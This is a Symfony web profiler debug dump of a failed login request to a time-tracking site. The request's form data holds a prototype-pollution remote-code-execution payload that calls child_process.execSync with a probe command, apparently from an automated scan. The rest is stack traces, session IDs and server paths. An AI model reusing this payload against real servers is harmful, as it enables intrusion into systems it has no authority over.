Redirect 302 redirect from POST @app_login (d4a7b4)

POST https://tt.muex.de/login

Request / Response

Request

GET Parameters

No GET parameters

POST Parameters

Key Value
0
"{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});", "_chunks": "$Q2", "_formData": {"get": "$1:constructor:constructor"}}}"
1
""$@0""
1_$ACTION_ID_vercel
""""
2
"[]"

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_controller
"App\Controller\SecurityController::login"
_firewall_context
"security.firewall.map.context.main"
_redirected
true
_route
"app_login"
_route_params
[]
_security_firewall_run
"_security_main"
_stopwatch_token
"301651"

Request Headers

Header Value
accept
"*/*"
accept-encoding
"gzip, deflate"
connection
"keep-alive"
content-length
"860"
content-type
"multipart/form-data; boundary=--------WebKitFormBoundarya9a7a818565d478e"
cookie
"PHPSESSID=52d863b55ef82d06d55d823542b202f6; sf_redirect=%7B%22token%22%3A%22d4a7b4%22%2C%22route%22%3A%22app_login%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CSecurityController%22%2C%22method%22%3A%22login%22%2C%22file%22%3A%22%5C%2Fwww%5C%2Fhtdocs%5C%2Fw0186f22%5C%2Ftt.muex.de%5C%2Ftimetracker%5C%2Fsrc%5C%2FController%5C%2FSecurityController.php%22%2C%22line%22%3A13%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D"
host
"tt.muex.de"
next-action
"x"
user-agent
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
x-le-client-ip
"3.79.7.137"
x-le-client-ua
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
x-nextjs-request-id
"67093fcf"
x-php-ob-level
"0"

Request Content

Request content not available (it was retrieved as a resource).

Response

Response Headers

Header Value
cache-control
"no-cache, private"
content-type
"text/html; charset=utf-8"
date
"Fri, 03 Apr 2026 14:44:19 GMT"
location
"/login"
x-debug-token
"eb8ab8"

Cookies

Request Cookies

Key Value
PHPSESSID
"52d863b55ef82d06d55d823542b202f6"
sf_redirect
"{"token":"d4a7b4","route":"app_login","method":"POST","controller":{"class":"App\\Controller\\SecurityController","method":"login","file":"\/www\/htdocs\/w0186f22\/tt.muex.de\/timetracker\/src\/Controller\/SecurityController.php","line":13},"status_code":302,"status_text":"Found"}"

Response Cookies

No response cookies

Session 7

Session Metadata

Key Value
Created
"Fri, 03 Apr 26 16:44:05 +0200"
Last used
"Fri, 03 Apr 26 16:44:19 +0200"
Lifetime
0

Session Attributes

Attribute Value
_csrf/https-authenticate
"TEhUcdwXMSDpuA6XVnAfhsAktKxSanxDw3pzI7R6D0A"
_security.last_error
Symfony\Component\Security\Core\Exception\InvalidCsrfTokenException {#288
  #message: "Invalid CSRF token."
  #code: 0
  #file: "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/EventListener/CsrfProtectionListener.php"
  #line: 51
  -token: null
  trace: {
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/EventListener/CsrfProtectionListener.php:51 {
      Symfony\Component\Security\Http\EventListener\CsrfProtectionListener->checkPassport(CheckPassportEvent $event): void …
      › if (false === $this->csrfTokenManager->isTokenValid($csrfToken)) {    throw new InvalidCsrfTokenException('Invalid CSRF token.');}
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:116 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › try {    ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);} finally {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#130 …}
        ...: {
          "kernel.request"
          Symfony\Component\HttpKernel\Debug\TraceableEventDispatcher {#53 …}
        }
      }
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php:220 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
      ›     }    $listener($event, $eventName, $this);}
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#130 …}
        $eventName: "kernel.request"
        $dispatcher: Symfony\Component\HttpKernel\Debug\TraceableEventDispatcher {#53 …}
      }
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php:56 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, ?string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
      arguments: {
        $listeners: [ …9]
        $eventName: "kernel.request"
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#130 …}
      }
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:139 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, ?string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#130 …}
        $eventName: "kernel.request"
      }
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:180 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->executeAuthenticator(AuthenticatorInterface $authenticator, Request $request): Response …
      › $event = new CheckPassportEvent($authenticator, $passport);$this->eventDispatcher->dispatch($event);arguments: {
        $event: Symfony\Component\Security\Http\Event\CheckPassportEvent {#254 …}
      }
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:158 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->executeAuthenticators(array $authenticators, Request $request): Response …
      › 
      › $response = $this->executeAuthenticator($authenticator, $request);if (null !== $response) {
      arguments: {
        $authenticator: Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticator {#260 …}
        $request: Symfony\Component\HttpFoundation\Request {#15 …}
      }
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:140 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->authenticateRequest(Request $request): Response …
      › 
      ›     return $this->executeAuthenticators($authenticators, $request);}
      arguments: {
        $authenticators: [ …1]
        $request: Symfony\Component\HttpFoundation\Request {#15 …}
      }
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php:40 {
      Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener->authenticate(RequestEvent $event): void …
      › $request = $event->getRequest();$response = $this->authenticatorManager->authenticateRequest($request);if (null === $response) {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#15 …}
      }
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php:68 {
      Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener->authenticate(RequestEvent $event): void …
      › 
      › $this->authenticationManagerListener->authenticate($event);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#130 …}
      }
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php:46 {
      Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener->authenticate(RequestEvent $event): void …
      › try {    $this->listener->authenticate($event);} catch (LazyResponseException $e) {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#130 …}
      }
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Firewall/AbstractListener.php:26 {
      Symfony\Component\Security\Http\Firewall\AbstractListener->__invoke(RequestEvent $event): void …
      › if (false !== $this->supports($event->getRequest())) {    $this->authenticate($event);}
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#130 …}
      }
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-bundle/Security/LazyFirewallContext.php:60 {
      Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext->__invoke(RequestEvent $event): void …
      › foreach ($listeners as $listener) {    $listener($event);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#130 …}
      }
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php:80 {
      Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener->callListeners(RequestEvent $event, iterable $listeners): void …
      › 
      ›     $listener($event);} else {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#130 …}
      }
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Firewall.php:95 {
      Symfony\Component\Security\Http\Firewall->onKernelRequest(RequestEvent $event) …
      › 
      ›     $this->callListeners($event, $authenticationListeners());}
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#130 …}
        $listeners: Generator {#207 …}
      }
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:116 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › try {    ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);} finally {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#130 …}
        ...: {
          "kernel.request"
          Symfony\Component\HttpKernel\Debug\TraceableEventDispatcher {#53 …}
        }
      }
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php:220 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
      ›     }    $listener($event, $eventName, $this);}
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#130 …}
        $eventName: "kernel.request"
        $dispatcher: Symfony\Component\HttpKernel\Debug\TraceableEventDispatcher {#53 …}
      }
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php:56 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, ?string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
      arguments: {
        $listeners: [ …9]
        $eventName: "kernel.request"
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#130 …}
      }
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:139 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, ?string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#130 …}
        $eventName: "kernel.request"
      }
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/HttpKernel.php:157 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#130 …}
        $eventName: "kernel.request"
      }
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/HttpKernel.php:76 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
      › try {    return $response = $this->handleRaw($request, $type);} catch (\Throwable $e) {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#15 …}
        $type: 1
      }
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/Kernel.php:197 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#15 …}
        $type: 1
        $catch: true
      }
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35 {
      Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run(): int …
      › {    $response = $this->kernel->handle($this->request);arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#15 …}
      }
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/autoload_runtime.php:29 {
      require_once …
      ›         ->getRunner($app)        ->run());
    }
    /www/htdocs/w0186f22/tt.muex.de/timetracker/public/index.php:5 {
      › 
      › require_once dirname(__DIR__).'/vendor/autoload_runtime.php';arguments: {
        "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/autoload_runtime.php"
      }
    }
  }
}
_security.last_username
""
_security.main.target_path
"https://tt.muex.de/old_phpinfo.php"

Session Usage

7 Usages
Stateless check enabled
Usage
Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage:41
[
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-core/Authentication/Token/Storage/UsageTrackingTokenStorage.php"
    "line" => 41
    "function" => "getMetadataBag"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 172
    "function" => "getToken"
    "class" => "Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 158
    "function" => "executeAuthenticator"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 140
    "function" => "executeAuthenticators"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
    "line" => 40
    "function" => "authenticateRequest"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
    "line" => 68
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
    "line" => 46
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Firewall/AbstractListener.php"
    "line" => 26
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-bundle/Security/LazyFirewallContext.php"
    "line" => 60
    "function" => "__invoke"
    "class" => "Symfony\Component\Security\Http\Firewall\AbstractListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
    "line" => 80
    "function" => "__invoke"
    "class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Firewall.php"
    "line" => 95
    "function" => "callListeners"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 116
    "function" => "onKernelRequest"
    "class" => "Symfony\Component\Security\Http\Firewall"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 220
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 139
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 157
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 76
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/Kernel.php"
    "line" => 197
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/autoload_runtime.php"
    "line" => 29
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/public/index.php"
    "line" => 5
    "args" => [
      "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]
App\Security\LoginAuthenticator:32
[
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/src/Security/LoginAuthenticator.php"
    "line" => 32
    "function" => "set"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticator.php"
    "line" => 70
    "function" => "authenticate"
    "class" => "App\Security\LoginAuthenticator"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 176
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticator"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 158
    "function" => "executeAuthenticator"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 140
    "function" => "executeAuthenticators"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
    "line" => 40
    "function" => "authenticateRequest"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
    "line" => 68
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
    "line" => 46
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Firewall/AbstractListener.php"
    "line" => 26
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-bundle/Security/LazyFirewallContext.php"
    "line" => 60
    "function" => "__invoke"
    "class" => "Symfony\Component\Security\Http\Firewall\AbstractListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
    "line" => 80
    "function" => "__invoke"
    "class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Firewall.php"
    "line" => 95
    "function" => "callListeners"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 116
    "function" => "onKernelRequest"
    "class" => "Symfony\Component\Security\Http\Firewall"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 220
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 139
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 157
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 76
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/http-kernel/Kernel.php"
    "line" => 197
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/autoload_runtime.php"
    "line" => 29
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/public/index.php"
    "line" => 5
    "args" => [
      "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]
Symfony\Component\Security\Csrf\TokenStorage\SessionTokenStorage:79
[
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-csrf/TokenStorage/SessionTokenStorage.php"
    "line" => 79
    "function" => "has"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-csrf/CsrfTokenManager.php"
    "line" => 98
    "function" => "hasToken"
    "class" => "Symfony\Component\Security\Csrf\TokenStorage\SessionTokenStorage"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/EventListener/CsrfProtectionListener.php"
    "line" => 50
    "function" => "isTokenValid"
    "class" => "Symfony\Component\Security\Csrf\CsrfTokenManager"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 116
    "function" => "checkPassport"
    "class" => "Symfony\Component\Security\Http\EventListener\CsrfProtectionListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 220
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 139
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 180
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 158
    "function" => "executeAuthenticator"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 140
    "function" => "executeAuthenticators"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
    "line" => 40
    "function" => "authenticateRequest"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
    "line" => 68
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
    "line" => 46
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Firewall/AbstractListener.php"
    "line" => 26
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-bundle/Security/LazyFirewallContext.php"
    "line" => 60
    "function" => "__invoke"
    "class" => "Symfony\Component\Security\Http\Firewall\AbstractListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
    "line" => 80
    "function" => "__invoke"
    "class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/security-http/Firewall.php"
    "line" => 95
    "function" => "callListeners"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
    "type" => "->"
  ]
  [
    "file" => "/www/htdocs/w0186f22/tt.muex.de/timetracker/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
